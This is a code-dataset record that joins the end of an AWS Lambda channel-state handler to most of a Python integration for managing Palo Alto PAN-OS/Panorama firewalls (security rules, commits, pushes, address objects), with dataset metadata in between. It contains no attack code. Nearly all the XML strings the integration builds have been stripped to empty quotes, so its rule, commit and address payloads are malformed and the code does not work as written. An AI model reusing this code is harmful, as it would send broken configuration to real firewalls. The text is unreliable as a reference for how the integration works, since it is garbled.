Update Channel State on DDB ✅\n print(f'updating channel {ChannelId} State to STOPPED')\n ddb_channel.update_item(\n Key={\n 'ChannelId': ChannelId\n },\n UpdateExpression='set #keyState = :State, VoDID = :VoDID',\n ExpressionAttributeNames={\n '#keyState' : 'State',\n },\n ExpressionAttributeValues={\n ':State': 'IDLE',\n ':VoDID': None\n }\n )\n\n return 'ok'\n\n\n return 'ok'\n\ndef getChannelId (ChannelARN) :\n return ChannelARN.rsplit(':',1)[1]\n\n\ndef getFilename (s3key) :\n return s3key.rsplit('/',1)[1]","sub_path":"lambda/event/onChannelStateChange/onChannelStateChange.py","file_name":"onChannelStateChange.py","file_ext":"py","file_size_in_byte":5177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"173172968","text":"import shutil\n\nfrom CommonServerPython import *\n\n''' IMPORTS '''\nfrom datetime import datetime\nfrom typing import Dict, List, Any, Optional, Tuple, Union\nimport uuid\nimport json\nimport requests\n\n# disable insecure warnings\nrequests.packages.urllib3.disable_warnings()\n\n''' GLOBALS '''\nURL = ''\nAPI_KEY = None\nUSE_SSL = None\nUSE_URL_FILTERING = None\nTEMPLATE = None\nVSYS = ''\nPRE_POST = ''\n\nXPATH_SECURITY_RULES = ''\nDEVICE_GROUP = ''\n\nXPATH_OBJECTS = ''\n\nXPATH_RULEBASE = ''\n\n# Security rule arguments for output handling\nSECURITY_RULE_ARGS = {\n 'rulename': 'Name',\n 'source': 'Source',\n 'destination': 'Destination',\n 'negate_source': 'NegateSource',\n 'negate_destination': 'NegateDestination',\n 'action': 'Action',\n 'service': 'Service',\n 'disable': 'Disabled',\n 'application': 'Application',\n 'source_user': 'SourceUser',\n 'disable_server_response_inspection': 'DisableServerResponseInspection',\n 'description': 'Description',\n 'target': 'Target',\n 'log_forwarding': 'LogForwarding',\n 'log-setting': 'LogForwarding',\n 'tag': 'Tags',\n 'profile-setting': 'ProfileSetting',\n}\n\nPAN_OS_ERROR_DICT = {\n '1': 'Unknown command - The specific config or operational command is not recognized.',\n '2': 'Internal errors - Check with technical support when seeing these errors.',\n '3': 'Internal errors - Check with technical support when seeing these errors.',\n '4': 'Internal errors - Check with technical support when seeing these errors.',\n '5': 'Internal errors - Check with technical support when seeing these errors.',\n '6': 'Bad Xpath -The xpath specified in one or more attributes of the command is invalid.'\n 'Check the API browser for proper xpath values.',\n '7': 'Object not present - Object specified by the xpath is not present. For example,'\n 'entry[@name=value] where no object with name value is present.',\n '8': 'Object not unique - For commands that operate on a single object, the specified object is not unique.',\n '10': 'Reference count not zero - Object cannot be deleted as there are other objects that refer to it.'\n 'For example, address object still in use in policy.',\n '11': 'Internal error - Check with technical support when seeing these errors.',\n '12': 'Invalid object - Xpath or element values provided are not complete.',\n '14': 'Operation not possible - Operation is allowed but not possible in this case.'\n 'For example, moving a rule up one position when it is already at the top.',\n '15': 'Operation denied - Operation is allowed. 
For example, Admin not allowed to delete own account,'\n 'Running a command that is not allowed on a passive device.',\n '16': 'Unauthorized -The API role does not have access rights to run this query.',\n '17': 'Invalid command -Invalid command or parameters.',\n '18': 'Malformed command - The XML is malformed.',\n # 19,20: success\n '21': 'Internal error - Check with technical support when seeing these errors.',\n '22': 'Session timed out - The session for this query timed out.'\n}\n\n\nclass PAN_OS_Not_Found(Exception):\n \"\"\" PAN-OS Error. \"\"\"\n\n def __init__(self, *args): # real signature unknown\n pass\n\n\ndef http_request(uri: str, method: str, headers: dict = {},\n body: dict = {}, params: dict = {}, files: dict = None, is_pcap: bool = False) -> Any:\n \"\"\"\n Makes an API call with the given arguments\n \"\"\"\n result = requests.request(\n method,\n uri,\n headers=headers,\n data=body,\n verify=USE_SSL,\n params=params,\n files=files\n )\n\n if result.status_code < 200 or result.status_code >= 300:\n raise Exception(\n 'Request Failed. with status: ' + str(result.status_code) + '. Reason is: ' + str(result.reason))\n\n # if pcap download\n if is_pcap:\n return result\n\n json_result = json.loads(xml2json(result.text))\n\n # handle raw response that does not contain the response key, e.g configuration export\n if ('response' not in json_result or '@code' not in json_result['response']) and \\\n not json_result['response']['@status'] != 'success':\n return json_result\n\n # handle non success\n if json_result['response']['@status'] != 'success':\n if 'msg' in json_result['response'] and 'line' in json_result['response']['msg']:\n # catch non existing object error and display a meaningful message\n if json_result['response']['msg']['line'] == 'No such node':\n raise Exception(\n 'Object was not found, verify that the name is correct and that the instance was committed.')\n\n # catch urlfiltering error and display a meaningful message\n elif str(json_result['response']['msg']['line']).find('test -> url') != -1:\n if DEVICE_GROUP:\n raise Exception('URL filtering commands are only available on Firewall devices.')\n raise Exception('The URL filtering license is either expired or not active.'\n ' Please contact your PAN-OS representative.')\n\n # catch non valid jobID errors and display a meaningful message\n elif isinstance(json_result['response']['msg']['line'], str) and \\\n json_result['response']['msg']['line'].find('job') != -1 and \\\n (json_result['response']['msg']['line'].find('not found') != -1\n or json_result['response']['msg']['line'].find('No such query job')) != -1:\n raise Exception('Invalid Job ID error: ' + json_result['response']['msg']['line'])\n\n # catch already at the top/bottom error for rules and return this as an entry.note\n elif str(json_result['response']['msg']['line']).find('already at the') != -1:\n return_results('Rule ' + str(json_result['response']['msg']['line']))\n sys.exit(0)\n\n # catch already registered ip tags and return this as an entry.note\n elif str(json_result['response']['msg']['line']).find('already exists, ignore') != -1:\n if isinstance(json_result['response']['msg']['line']['uid-response']['payload']['register']['entry'],\n list):\n ips = [o['@ip'] for o in\n json_result['response']['msg']['line']['uid-response']['payload']['register']['entry']]\n else:\n ips = json_result['response']['msg']['line']['uid-response']['payload']['register']['entry']['@ip']\n return_results(\n 'IP ' + str(ips) + ' already exist in the tag. 
All submitted IPs were not registered to the tag.')\n sys.exit(0)\n\n # catch timed out log queries and return this as an entry.note\n elif str(json_result['response']['msg']['line']).find('Query timed out') != -1:\n return_results(str(json_result['response']['msg']['line']) + '. Rerun the query.')\n sys.exit(0)\n\n if '@code' in json_result['response']:\n raise Exception(\n 'Request Failed.\\nStatus code: ' + str(json_result['response']['@code']) + '\\nWith message: ' + str(\n json_result['response']['msg']['line']))\n else:\n raise Exception('Request Failed.\\n' + str(json_result['response']))\n\n # handle @code\n if json_result['response']['@code'] in PAN_OS_ERROR_DICT:\n error_message = 'Request Failed.\\n' + PAN_OS_ERROR_DICT[json_result['response']['@code']]\n if json_result['response']['@code'] == '7' and DEVICE_GROUP:\n device_group_names = get_device_groups_names()\n if DEVICE_GROUP not in device_group_names:\n error_message += (f'\\nDevice Group: {DEVICE_GROUP} does not exist.'\n f' The available Device Groups for this instance:'\n f' {\", \".join(device_group_names)}.')\n raise PAN_OS_Not_Found(error_message)\n return_warning('List not found and might be empty', True)\n if json_result['response']['@code'] not in ['19', '20']:\n # error code non exist in dict and not of success\n if 'msg' in json_result['response']:\n raise Exception(\n 'Request Failed.\\nStatus code: ' + str(json_result['response']['@code']) + '\\nWith message: ' + str(\n json_result['response']['msg']))\n else:\n raise Exception('Request Failed.\\n' + str(json_result['response']))\n\n return json_result\n\n\ndef add_argument_list(arg: Any, field_name: str, member: Optional[bool], any_: Optional[bool] = False) -> str:\n member_stringify_list = ''\n if arg:\n if isinstance(arg, str):\n arg = [arg]\n\n for item in arg:\n member_stringify_list += '' + item + ''\n if field_name == 'member':\n return member_stringify_list\n elif member:\n return '<' + field_name + '>' + member_stringify_list + ''\n else:\n return '<' + field_name + '>' + arg + ''\n if any_:\n if member:\n return '<' + field_name + '>any'\n else:\n return '<' + field_name + '>any'\n else:\n return ''\n\n\ndef add_argument(arg: Optional[str], field_name: str, member: bool) -> str:\n if arg:\n if member:\n return '<' + field_name + '>' + arg + ''\n else:\n return '<' + field_name + '>' + arg + ''\n else:\n return ''\n\n\ndef add_argument_open(arg: Optional[str], field_name: str, member: bool) -> str:\n if arg:\n if member:\n return '<' + field_name + '>' + arg + ''\n else:\n return '<' + field_name + '>' + arg + ''\n else:\n if member:\n return '<' + field_name + '>any'\n else:\n return '<' + field_name + '>any'\n\n\ndef add_argument_yes_no(arg: Optional[str], field_name: str, option: bool = False) -> str:\n if arg and arg == 'No':\n result = '<' + field_name + '>' + 'no' + ''\n else:\n result = '<' + field_name + '>' + ('yes' if arg else 'no') + ''\n\n if option:\n result = ''\n\n return result\n\n\ndef add_argument_target(arg: Optional[str], field_name: str) -> str:\n if arg:\n return '<' + field_name + '>' + '' + '' + '' + ''\n else:\n return ''\n\n\ndef add_argument_profile_setting(arg: Optional[str], field_name: str) -> str:\n if not arg:\n return ''\n member_stringify_list = '' + arg + ''\n return '<' + field_name + '>' + '' + member_stringify_list + '' + ''\n\n\ndef set_xpath_network(template: str = None) -> Tuple[str, Optional[str]]:\n \"\"\"\n Setting template xpath relevant to panorama instances.\n \"\"\"\n if template:\n if not DEVICE_GROUP 
or VSYS:\n raise Exception('Template is only relevant for Panorama instances.')\n if not template:\n template = TEMPLATE\n # setting network xpath relevant to FW or panorama management\n if DEVICE_GROUP:\n xpath_network = f'/config/devices/entry[@name=\\'localhost.localdomain\\']/template/entry[@name=\\'{template}\\']' \\\n f'/config/devices/entry[@name=\\'localhost.localdomain\\']/network'\n else:\n xpath_network = \"/config/devices/entry[@name='localhost.localdomain']/network\"\n return xpath_network, template\n\n\ndef prepare_security_rule_params(api_action: str = None, rulename: str = None, source: Any = None,\n destination: Any = None, negate_source: str = None,\n negate_destination: str = None, action: str = None, service: List[str] = None,\n disable: str = None, application: List[str] = None, source_user: str = None,\n category: List[str] = None, from_: str = None, to: str = None, description: str = None,\n target: str = None, log_forwarding: str = None,\n disable_server_response_inspection: str = None, tags: List[str] = None,\n profile_setting: str = None) -> Dict:\n if application is None or len(application) == 0:\n # application always must be specified and the default should be any\n application = ['any']\n\n # flake8: noqa\n rulename = rulename if rulename else ('demisto-' + (str(uuid.uuid4()))[:8])\n params = {\n 'type': 'config',\n 'action': api_action,\n 'key': API_KEY,\n 'element': add_argument_open(action, 'action', False)\n + add_argument_target(target, 'target')\n + add_argument_open(description, 'description', False)\n + add_argument_list(source, 'source', True, True)\n + add_argument_list(destination, 'destination', True, True)\n + add_argument_list(application, 'application', True)\n + add_argument_list(category, 'category', True)\n + add_argument_open(source_user, 'source-user', True)\n + add_argument_list(from_, 'from', True, True) # default from will always be any\n + add_argument_list(to, 'to', True, True) # default to will always be any\n + add_argument_list(service, 'service', True, True)\n + add_argument_yes_no(negate_source, 'negate-source')\n + add_argument_yes_no(negate_destination, 'negate-destination')\n + add_argument_yes_no(disable, 'disabled')\n + add_argument_yes_no(disable_server_response_inspection, 'disable-server-response-inspection', True)\n + add_argument(log_forwarding, 'log-setting', False)\n + add_argument_list(tags, 'tag', True)\n + add_argument_profile_setting(profile_setting, 'profile-setting')\n }\n if DEVICE_GROUP:\n if not PRE_POST:\n raise Exception('Please provide the pre_post argument when configuring'\n ' a security rule in Panorama instance.')\n else:\n params['xpath'] = XPATH_SECURITY_RULES + PRE_POST + '/security/rules/entry' + '[@name=\\'' + rulename + '\\']'\n else:\n params['xpath'] = XPATH_SECURITY_RULES + '[@name=\\'' + rulename + '\\']'\n return params\n\n\ndef get_pan_os_version() -> str:\n \"\"\"Retrieves pan-os version\n\n Returns:\n String representation of the version\n \"\"\"\n params = {\n 'type': 'version',\n 'key': API_KEY\n }\n result = http_request(URL, 'GET', params=params)\n version = result['response']['result']['sw-version']\n return version\n\n\ndef get_pan_os_major_version() -> int:\n \"\"\"Retrieves pan-os major version\n\n Returns:\n String representation of the major version\n \"\"\"\n major_version = int(get_pan_os_version().split('.')[0])\n return major_version\n\n\n''' FUNCTIONS'''\n\n\ndef panorama_test():\n \"\"\"\n test module\n \"\"\"\n params = {\n 'type': 'op',\n 'cmd': '',\n 'key': API_KEY\n 
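# The 'cmd' value is an operational command in the PAN-OS XML API; its XML body is\n    # missing in this copy of the source. A typical connectivity check (an assumption\n    # based on the public PAN-OS XML API, not taken from this file) would be:\n    # '<show><system><info></info></system></show>'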
}\n\n http_request(\n URL,\n 'GET',\n params=params\n )\n\n if DEVICE_GROUP and DEVICE_GROUP != 'shared':\n device_group_test()\n\n _, template = set_xpath_network()\n if template:\n template_test(template)\n\n return_results('ok')\n\n\ndef get_device_groups_names():\n \"\"\"\n Get device group names in the Panorama\n \"\"\"\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': \"/config/devices/entry/device-group/entry\",\n 'key': API_KEY\n }\n\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n\n device_groups = result['response']['result']['entry']\n device_group_names = []\n if isinstance(device_groups, dict):\n # only one device group in the panorama\n device_group_names.append(device_groups.get('@name'))\n else:\n for device_group in device_groups:\n device_group_names.append(device_group.get('@name'))\n\n return device_group_names\n\n\ndef device_group_test():\n \"\"\"\n Test module for the Device group specified\n \"\"\"\n device_group_names = get_device_groups_names()\n if DEVICE_GROUP not in device_group_names:\n raise Exception(f'Device Group: {DEVICE_GROUP} does not exist.'\n f' The available Device Groups for this instance: {\", \".join(device_group_names)}.')\n\n\ndef get_templates_names():\n \"\"\"\n Get templates names in the Panorama\n \"\"\"\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': \"/config/devices/entry[@name=\\'localhost.localdomain\\']/template/entry\",\n 'key': API_KEY\n }\n\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n\n templates = result['response']['result']['entry']\n template_names = []\n if isinstance(templates, dict):\n # only one device group in the panorama\n template_names.append(templates.get('@name'))\n else:\n for template in templates:\n template_names.append(template.get('@name'))\n\n return template_names\n\n\ndef template_test(template: str):\n \"\"\"\n Test module for the Template specified\n \"\"\"\n template_names = get_templates_names()\n if template not in template_names:\n raise Exception(f'Template: {template} does not exist.'\n f' The available Templates for this instance: {\", \".join(template_names)}.')\n\n\n@logger\ndef panorama_command(args: dict):\n \"\"\"\n Executes a command\n \"\"\"\n params = {}\n for arg in args.keys():\n params[arg] = args[arg]\n params['key'] = API_KEY\n\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Command was executed successfully.',\n })\n\n\n@logger\ndef panorama_commit():\n params = {\n 'type': 'commit',\n 'cmd': '',\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n\n return result\n\n\ndef panorama_commit_command():\n \"\"\"\n Commit and show message in warroom\n \"\"\"\n result = panorama_commit()\n\n if 'result' in result['response']:\n # commit has been given a jobid\n commit_output = {\n 'JobID': result['response']['result']['job'],\n 'Status': 'Pending'\n }\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Commit:', commit_output, ['JobID', 'Status'], removeNull=True),\n 'EntryContext': {\n \"Panorama.Commit(val.JobID == obj.JobID)\": commit_output\n }\n })\n else:\n # no changes to commit\n return_results(result['response']['msg'])\n\n\n@logger\ndef panorama_commit_status(args: 
dict):\n params = {\n 'type': 'op',\n 'cmd': '' + args['job_id'] + '',\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n\n return result\n\n\ndef panorama_commit_status_command(args: dict):\n \"\"\"\n Check jobID of commit status\n \"\"\"\n result = panorama_commit_status(args)\n\n if result['response']['result']['job']['type'] != 'Commit':\n raise Exception('JobID given is not of a commit.')\n\n commit_status_output = {'JobID': result['response']['result']['job']['id']}\n if result['response']['result']['job']['status'] == 'FIN':\n if result['response']['result']['job']['result'] == 'OK':\n commit_status_output['Status'] = 'Completed'\n else:\n # result['response']['job']['result'] == 'FAIL'\n commit_status_output['Status'] = 'Failed'\n commit_status_output['Details'] = result['response']['result']['job']['details']['line']\n\n if result['response']['result']['job']['status'] == 'ACT':\n if result['response']['result']['job']['result'] == 'PEND':\n commit_status_output['Status'] = 'Pending'\n\n # WARNINGS - Job warnings\n status_warnings = []\n if result.get(\"response\", {}).get('result', {}).get('job', {}).get('warnings', {}):\n status_warnings = result.get(\"response\", {}).get('result', {}).get('job', {}).get('warnings', {}).get('line',\n [])\n ignored_error = 'configured with no certificate profile'\n commit_status_output[\"Warnings\"] = [item for item in status_warnings if item not in ignored_error]\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Commit status:', commit_status_output,\n ['JobID', 'Status', 'Details', 'Warnings'],\n removeNull=True),\n 'EntryContext': {\"Panorama.Commit(val.JobID == obj.JobID)\": commit_status_output}\n })\n\n\n@logger\ndef panorama_push_to_device_group():\n params = {\n 'type': 'commit',\n 'action': 'all',\n 'cmd': '',\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n\n return result\n\n\ndef panorama_push_to_device_group_command():\n \"\"\"\n Push Panorama configuration and show message in warroom\n \"\"\"\n if not DEVICE_GROUP:\n raise Exception(\"The 'panorama-push-to-device-group' command is relevant for a Palo Alto Panorama instance.\")\n\n result = panorama_push_to_device_group()\n if 'result' in result['response']:\n # commit has been given a jobid\n push_output = {\n 'DeviceGroup': DEVICE_GROUP,\n 'JobID': result['response']['result']['job'],\n 'Status': 'Pending'\n }\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Push to Device Group:', push_output, ['JobID', 'Status'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.Push(val.JobID == obj.JobID)\": push_output\n }\n })\n else:\n # no changes to commit\n return_results(result['response']['msg']['line'])\n\n\n@logger\ndef panorama_push_status(job_id: str):\n params = {\n 'type': 'op',\n 'cmd': '' + job_id + '',\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n\n return result\n\n\ndef safeget(dct: dict, keys: List[str]):\n # Safe get from dictionary\n for key in keys:\n try:\n if isinstance(dct, dict):\n dct = dct[key]\n else:\n return None\n except KeyError:\n return None\n return dct\n\n\ndef panorama_push_status_command(job_id: str):\n \"\"\"\n Check jobID of push status\n \"\"\"\n result = 
panorama_push_status(job_id)\n job = result.get('response', {}).get('result', {}).get('job', {})\n if job.get('type', '') != 'CommitAll':\n raise Exception('JobID given is not of a Push.')\n\n push_status_output = {'JobID': job.get('id')}\n if job.get('status', '') == 'FIN':\n if job.get('result', '') == 'OK':\n push_status_output['Status'] = 'Completed'\n else:\n push_status_output['Status'] = 'Failed'\n\n devices = job.get('devices')\n devices = devices.get('entry') if devices else devices\n if isinstance(devices, list):\n devices_details = [device.get('status') for device in devices if device]\n push_status_output['Details'] = devices_details\n elif isinstance(devices, dict):\n push_status_output['Details'] = devices.get('status')\n\n if job.get('status') == 'PEND':\n push_status_output['Status'] = 'Pending'\n\n # WARNINGS - Job warnings\n status_warnings = [] # type: ignore\n devices = safeget(result, [\"response\", \"result\", \"job\", \"devices\", \"entry\"])\n if devices:\n for device in devices:\n device_warnings = safeget(device, [\"details\", \"msg\", \"warnings\", \"line\"])\n status_warnings.extend([] if not device_warnings else device_warnings)\n push_status_output[\"Warnings\"] = status_warnings\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Push to Device Group status:', push_status_output,\n ['JobID', 'Status', 'Details', 'Warnings'], removeNull=True),\n 'EntryContext': {\"Panorama.Push(val.JobID == obj.JobID)\": push_status_output}\n })\n\n\n''' Addresses Commands '''\n\n\ndef prettify_addresses_arr(addresses_arr: list) -> List:\n if not isinstance(addresses_arr, list):\n return prettify_address(addresses_arr)\n pretty_addresses_arr = []\n for address in addresses_arr:\n pretty_address = {'Name': address['@name']}\n if DEVICE_GROUP:\n pretty_address['DeviceGroup'] = DEVICE_GROUP\n if 'description' in address:\n pretty_address['Description'] = address['description']\n\n if 'ip-netmask' in address:\n pretty_address['IP_Netmask'] = address['ip-netmask']\n\n if 'ip-range' in address:\n pretty_address['IP_Range'] = address['ip-range']\n\n if 'fqdn' in address:\n pretty_address['FQDN'] = address['fqdn']\n\n if 'tag' in address and 'member' in address['tag']:\n pretty_address['Tags'] = address['tag']['member']\n\n pretty_addresses_arr.append(pretty_address)\n\n return pretty_addresses_arr\n\n\n@logger\ndef panorama_list_addresses(tag: Optional[str] = None):\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"address/entry\",\n 'key': API_KEY\n }\n\n if tag:\n params['xpath'] = f'{params[\"xpath\"]}[( tag/member = \\'{tag}\\')]'\n\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_list_addresses_command(args: dict):\n \"\"\"\n Get all addresses\n \"\"\"\n addresses_arr = panorama_list_addresses(args.get('tag'))\n addresses_output = prettify_addresses_arr(addresses_arr)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': addresses_arr,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Addresses:', addresses_output,\n ['Name', 'IP_Netmask', 'IP_Range', 'FQDN', 'Tags'], removeNull=True),\n 'EntryContext': {\n \"Panorama.Addresses(val.Name == obj.Name)\": addresses_output\n }\n })\n\n\ndef prettify_address(address: Dict) -> Dict:\n pretty_address = 
{'Name': address['@name']}\n if DEVICE_GROUP:\n pretty_address['DeviceGroup'] = DEVICE_GROUP\n if 'description' in address:\n pretty_address['Description'] = address['description']\n\n if 'ip-netmask' in address:\n pretty_address['IP_Netmask'] = address['ip-netmask']\n\n if 'ip-range' in address:\n pretty_address['IP_Range'] = address['ip-range']\n\n if 'fqdn' in address:\n pretty_address['FQDN'] = address['fqdn']\n\n if 'tag' in address and 'member' in address['tag']:\n pretty_address['Tags'] = address['tag']['member']\n\n return pretty_address\n\n\n@logger\ndef panorama_get_address(address_name: str) -> Dict:\n params = {\n 'action': 'show',\n 'type': 'config',\n 'xpath': f'{XPATH_OBJECTS}address/entry[@name=\\'{address_name}\\']',\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_get_address_command(args: dict):\n \"\"\"\n Get an address\n \"\"\"\n address_name = args.get('name')\n\n address = panorama_get_address(address_name)\n address_output = prettify_address(address)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': address,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Address:', address_output,\n ['Name', 'IP_Netmask', 'IP_Range', 'FQDN', 'Tags'], removeNull=True),\n 'EntryContext': {\n \"Panorama.Addresses(val.Name == obj.Name)\": address_output\n }\n })\n\n\n@logger\ndef panorama_create_address(address_name: str, fqdn: str = None, ip_netmask: str = None, ip_range: str = None,\n description: str = None, tags: list = None):\n params = {'action': 'set',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"address/entry[@name='\" + address_name + \"']\",\n 'key': API_KEY,\n 'element': (add_argument(fqdn, 'fqdn', False)\n + add_argument(ip_netmask, 'ip-netmask', False)\n + add_argument(ip_range, 'ip-range', False)\n + add_argument(description, 'description', False)\n + add_argument_list(tags, 'tag', True))\n }\n\n http_request(\n URL,\n 'POST',\n body=params,\n )\n\n\ndef panorama_create_address_command(args: dict):\n \"\"\"\n Create an address object\n \"\"\"\n address_name = args['name']\n description = args.get('description')\n tags = argToList(args['tag']) if 'tag' in args else None\n\n fqdn = args.get('fqdn')\n ip_netmask = args.get('ip_netmask')\n ip_range = args.get('ip_range')\n\n if not fqdn and not ip_netmask and not ip_range:\n raise Exception('Please specify exactly one of the following: fqdn, ip_netmask, ip_range.')\n\n if (fqdn and ip_netmask) or (fqdn and ip_range) or (ip_netmask and ip_range):\n raise Exception('Please specify exactly one of the following: fqdn, ip_netmask, ip_range.')\n\n address = panorama_create_address(address_name, fqdn, ip_netmask, ip_range, description, tags)\n\n address_output = {'Name': address_name}\n if DEVICE_GROUP:\n address_output['DeviceGroup'] = DEVICE_GROUP\n if fqdn:\n address_output['FQDN'] = fqdn\n if ip_netmask:\n address_output['IP_Netmask'] = ip_netmask\n if ip_range:\n address_output['IP_Range'] = ip_range\n if description:\n address_output['Description'] = description\n if tags:\n address_output['Tags'] = tags\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': address,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Address was created successfully.',\n 'EntryContext': {\n \"Panorama.Addresses(val.Name == obj.Name)\": address_output\n }\n })\n\n\n@logger\ndef 
panorama_delete_address(address_name: str):\n params = {\n 'action': 'delete',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"address/entry[@name='\" + address_name + \"']\",\n 'element': \"\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_delete_address_command(args: dict):\n \"\"\"\n Delete an address\n \"\"\"\n address_name = args.get('name')\n\n address = panorama_delete_address(address_name)\n address_output = {'Name': address_name}\n if DEVICE_GROUP:\n address_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': address,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Address was deleted successfully.',\n 'EntryContext': {\n \"Panorama.Addresses(val.Name == obj.Name)\": address_output\n }\n })\n\n\n''' Address Group Commands '''\n\n\ndef prettify_address_groups_arr(address_groups_arr: list) -> List:\n if not isinstance(address_groups_arr, list):\n return prettify_address_group(address_groups_arr)\n pretty_address_groups_arr = []\n for address_group in address_groups_arr:\n pretty_address_group = {\n 'Name': address_group['@name'],\n 'Type': 'static' if 'static' in address_group else 'dynamic'\n }\n if DEVICE_GROUP:\n pretty_address_group['DeviceGroup'] = DEVICE_GROUP\n if 'description' in address_group:\n pretty_address_group['Description'] = address_group['description']\n if 'tag' in address_group and 'member' in address_group['tag']:\n pretty_address_group['Tags'] = address_group['tag']['member']\n\n if pretty_address_group['Type'] == 'static':\n # static address groups can have empty lists\n if address_group['static']:\n pretty_address_group['Addresses'] = address_group['static']['member']\n else:\n pretty_address_group['Match'] = address_group['dynamic']['filter']\n\n pretty_address_groups_arr.append(pretty_address_group)\n\n return pretty_address_groups_arr\n\n\n@logger\ndef panorama_list_address_groups(tag: str = None):\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"address-group/entry\",\n 'key': API_KEY\n }\n\n if tag:\n params['xpath'] = f'{params[\"xpath\"]}[( tag/member = \\'{tag}\\')]'\n\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_list_address_groups_command(args: dict):\n \"\"\"\n Get all address groups\n \"\"\"\n address_groups_arr = panorama_list_address_groups(args.get('tag'))\n address_groups_output = prettify_address_groups_arr(address_groups_arr)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': address_groups_arr,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Address groups:', address_groups_output,\n ['Name', 'Type', 'Addresses', 'Match', 'Description', 'Tags'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.AddressGroups(val.Name == obj.Name)\": address_groups_output\n }\n })\n\n\ndef prettify_address_group(address_group: Dict) -> Dict:\n pretty_address_group = {\n 'Name': address_group['@name'],\n 'Type': 'static' if 'static' in address_group else 'dynamic'\n }\n if DEVICE_GROUP:\n pretty_address_group['DeviceGroup'] = DEVICE_GROUP\n\n if 'description' in address_group:\n pretty_address_group['Description'] = address_group['description']\n if 'tag' in address_group and 'member' in address_group['tag']:\n pretty_address_group['Tags'] = address_group['tag']['member']\n\n if 
pretty_address_group['Type'] == 'static':\n pretty_address_group['Addresses'] = address_group['static']['member']\n else:\n pretty_address_group['Match'] = address_group['dynamic']['filter']\n\n return pretty_address_group\n\n\n@logger\ndef panorama_get_address_group(address_group_name: str):\n params = {\n 'action': 'show',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"address-group/entry[@name='\" + address_group_name + \"']\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_get_address_group_command(args: dict):\n \"\"\"\n Get an address group\n \"\"\"\n address_group_name = args.get('name')\n\n result = panorama_get_address_group(address_group_name)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Address group:', prettify_address_group(result),\n ['Name', 'Type', 'Addresses', 'Match', 'Description', 'Tags'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.AddressGroups(val.Name == obj.Name)\": prettify_address_group(result)\n }\n })\n\n\n@logger\ndef panorama_create_static_address_group(address_group_name: str, addresses: list,\n description: str = None, tags: list = None):\n params = {'action': 'set',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"address-group/entry[@name='\" + address_group_name + \"']\",\n 'key': API_KEY,\n 'element': (\n \"\" + add_argument_list(addresses, 'member', True)\n + \"\" + add_argument(description, 'description', False)\n + add_argument_list(tags, 'tag', True)\n )}\n\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_create_dynamic_address_group(address_group_name: str, match: Optional[str],\n description: str = None, tags: list = None):\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"address-group/entry[@name='\" + address_group_name + \"']\",\n 'element': 